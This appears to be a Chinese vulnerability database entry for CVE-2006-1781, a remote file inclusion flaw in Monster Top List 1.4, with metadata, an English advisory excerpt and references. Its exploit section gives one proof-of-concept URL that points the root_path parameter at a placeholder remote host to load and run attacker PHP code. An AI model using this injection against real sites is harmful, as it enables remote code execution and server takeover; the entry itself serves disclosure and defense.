Monster Top List Functions.PHP 远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110081 漏洞类型 代码注入
发布时间 2006-04-17 更新时间 2006-04-18
CVE编号 CVE-2006-1781 CNNVD-ID CNNVD-200604-207
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/27660
https://www.securityfocus.com/bid/17546
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200604-207
|漏洞详情
CircleRMonsterTopList(MTL)1.4中的functions.php页面存在PHP远程文件包含漏洞。这使得远程攻击者可以借助于root_path参数中的URL执行任意PHP代码。注意:后来报告称1.4.2及更早版本受此问题的影响。
|漏洞EXP
source: http://www.securityfocus.com/bid/17546/info

Monster Top List is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.

An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.

http://www.example.com/[path]/sources/functions.php?root_path=http://www.example.com/
|受影响的产品
Monster Top List Monster Top List 1.4
|参考资料

来源:XF
名称:monstertoplist-functions-file-include(25774)
链接:http://xforce.iss.net/xforce/xfdb/25774
来源:BID
名称:23074
链接:http://www.securityfocus.com/bid/23074
来源:BID
名称:17546
链接:http://www.securityfocus.com/bid/17546
来源:OSVDB
名称:24650
链接:http://www.osvdb.org/24650
来源:MILW0RM
名称:3530
链接:http://www.milw0rm.com/exploits/3530
来源:VUPEN
名称:ADV-2006-1350
链接:http://www.frsirt.com/english/advisories/2006/1350
来源:SECUNIA
名称:19688
链接:http://secunia.com/advisories/19688
来源:MISC
链接:http://pridels0.blogspot.com/2006/04/monstertoplist.html